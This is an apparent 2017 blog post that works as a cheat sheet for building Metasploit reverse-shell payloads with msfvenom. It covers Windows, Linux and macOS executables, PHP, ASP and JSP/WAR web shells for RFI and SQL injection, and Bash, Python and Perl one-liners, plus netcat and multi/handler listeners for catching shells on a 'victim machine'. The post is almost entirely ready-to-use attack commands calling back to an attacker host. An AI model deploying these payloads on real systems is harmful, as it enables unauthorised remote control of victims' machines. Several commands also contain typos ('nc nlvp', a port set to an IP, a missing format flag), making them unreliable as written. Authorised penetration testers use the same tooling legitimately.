Sunday 9 April 2017

Generating Metasploit Payloads : Creating Metasploit Reverse Shell

Generating Metasploit Payloads : Creating Metasploit Reverse Shell

Below is the different type of Metasploit Payloads we can use while to get the reverse shell of victim machine.

These exploit can be used in metasploit by using set payload "payloadnae" and before it we have to set multi handler which can be configured by use exploit/multi/handler

Mention payloads require certain inputs as an option such as LHOST, LPORT.

Operating System Based Bionaries Shell


msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -elf shell.elf

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe

msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho

Web Payloads : Usually For RFI, SQL Injection


msfvenom -p php/meterpreter_reverse_tcp LHOST=attackerip LPORT=attackerport -f raw > shell.php

Open the shell.php file in a text editor and remove the "#" will be present in starting position of this file.


msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f asp > shell.asp


msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerip -f raw > shell.jsp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f war > shell.war

Script Based Payloads:


msfvenom -p cmd/unix/reverse_python LHOST=attackerip LPORT=attackerport -f raw >


msfvenom -p cmd/unix/reverse_bash LHOST=attackerip LPORT=attackerport -f raw >

msfvenom -p cmd/unix/reverse_perl LHOST=attackerip LPORT=attackerport -f raw >


Linux Based Shellcode

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode

msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Simple TCP Reverse Shell






Handling The Reverse/Bind Connection

You can handle those reverse connection using Netcat and Metasploit Multi Handler Module.
Netcat : Use this command on your attacking machine : nc nlvp <attackerport>

Metasploit : In metasploit follow below steps to handle those reverse connection

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <AttackerIp>
set LPORT <AttackerPort>
exploit (This will prompt you the reverse just after executing the shell)
exploit -j (This will background the shell immedietly after receiving the reverse shell)

Note - Some time, you will not get the meterpreter reverse shell or the shell will be die
immediately due to various reasons. In this case first you can try to simple windows shell 

use exploit/multi/handler
set PAYLOAD <set payload windows/shell_reverse_tcp>
set LHOST <AttackerIp>
set LPORT <AttackerPort>
exploit -j 
exploit -j (This will background the shell immediately after receiving the reverse 
shell, After getting background you can interact with it by command session -i <sessionnumber>)

Now use this command to upgrade the simple reverse tcp shell into meterpreter reverse shell
sesssions -i <numberofsession> -u 

No comments:

Post a Comment